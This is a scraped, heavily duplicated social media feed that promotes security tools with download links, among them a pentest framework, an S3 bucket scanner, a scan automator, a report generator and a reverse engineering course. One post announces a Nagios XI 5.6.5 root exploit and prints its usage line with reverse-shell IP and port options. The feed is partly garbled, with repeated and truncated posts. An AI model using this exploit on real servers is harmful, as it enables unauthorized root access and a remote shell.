Photos from National Cyber Security Services's post
Tishna:-- Complete #Automated #pentest #framework for #Servers, #Application #Layer to #Web #Security.
Software have 61 Options with full #automation and can be used for web security #swiss #knife.
Brief Introduction:-
1. #Tishna is useful in #Banks, #Private #Organisations and #Ethical #hacker personnel for legal #auditing.
2. It serves as a #defense method to find as much information possible for gaining unauthorized access and intrusion.
3. With the emergence of more #advanced #technology, cybercriminals have also found more ways to get into the system of many organizations.
4. Tishna #software can audit, servers and web-behavior.
5. Tishna can perform #Scanning & #Enumeration as much as possible of the target.
6. It’s the first step to stop #cyber #criminals by securing your Servers and Web Application Security.
7. Tishna is false positive free when there is something it will show no matter what, if it is not, it will give blank results rather error.
#Download #Link:-
https://github.com/haroonawanofficial/Tishna
Tishna:-- Complete #Automated #pentest #framework for #Servers, #Application #Layer to #Web #Security.
Software have 61 Options with full #automation and can be used for web security #swiss #knife.
Brief Introduction:-
1. #Tishna is useful in #Banks, #Private #Organisations and #Ethical #hacker personnel for legal #auditing.
2. It serves as a #defense method to find as much information possible for gaining unauthorized access and intrusion.
3. With the emergence of more #advanced #technology, cybercriminals have also found more ways to get into the system of many organizations.
4. Tishna #software can audit, servers and web-behavior.
5. Tishna can perform #Scanning & #Enumeration as much as possible of the target.
6. It’s the first step to stop #cyber #criminals by securing your Servers and Web Application Security.
7. Tishna is false positive free when there is something it will show no matter what, if it is not, it will give blank results rather error.
#Download #Link:-
https://github.com/haroonawanofficial/Tishna
Forwarded from NusurTech 2 ©️
S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
S3Tk:-- A #Security #Toolkit For #Amazon S3.
Scan your #buckets for:-
1. #ACL open to public
2. policy open to public
3. public access blocked
4. logging enabled
5. versioning enabled
6. default #encryption enabled
#Download #Link:-
https://github.com/ankane/s3tk
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
Seccubus:-- #Easily #automated #vulnerability #scanning, #reporting, and #analysis.
#Seccubus automates regular vulnerability scans with various tools and aids #security people in the fast analysis of its output, both on the first scan and on repeated scans.
Seccubus V2 works with the following scanners:-
1. #Nessus
2. #OpenVAS
3. #Skipfish
4. #Medusa (local and remote)
5. #Nikto (local and remote)
6. #NMap (local and remote)
7. #OWASP-ZAP (local and remote)
8. #SSLyze
9. #Medusa
10. #Qualys #SSL labs
11. testssl.sh (local and remote)
#Download #Link:-
https://github.com/seccubus/seccubus
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
A vulnerability exists in Nagios XI <= 5.6.5 allowing an attacker to leverage an RCE to #escalate #privileges to root.
The exploit requires access to the server as the 'nagios' user, or CCM access via the web interface with permissions to manage #plugins.
A #PHP POC has been developed which #uploads a #payload resulting in a #reverse root shell.
#Usage:
php privesc.php --host=example.com --ssl=[true/false] --user=username --pass=password --reverseip=ip --reverseport=port
#Download #Link:-
https://github.com/jakgibb/nagiosxi-root-rce-exploit
nagiosxi-root-exploit:-- #POC which #exploits a #vulnerability within #Nagios XI (5.6.5) to #spawn a #root #shell
A vulnerability exists in Nagios XI
Photos from National Cyber Security Services's post
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
PwnDoc:-- #Pentesting #report generator.
#PwnDoc is a #pentest reporting #application making it simple and easy to write your findings and generate a customizable docx report. The main goal is to have more time to Pwn and less time to Doc by mutualizing data like #vulnerabilities between users.
#Download #Link:-
https://github.com/pwndoc/pwndoc
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering
Z0FCourse_ReverseEngineering:-- #Reverse #engineering course by Z0F. Focuses on x64 #Windows.
This course is going to teach anyone how to reverse engineer x64 Windows. We will start by covering some basics of #binaries, then reverse some small samples, #reverse a #DLL and implement it into our own #program, reverse some malware, then look at some realistic situations.
#Download #Link:-
https://github.com/0xZ0F/Z0FCourse_ReverseEngineering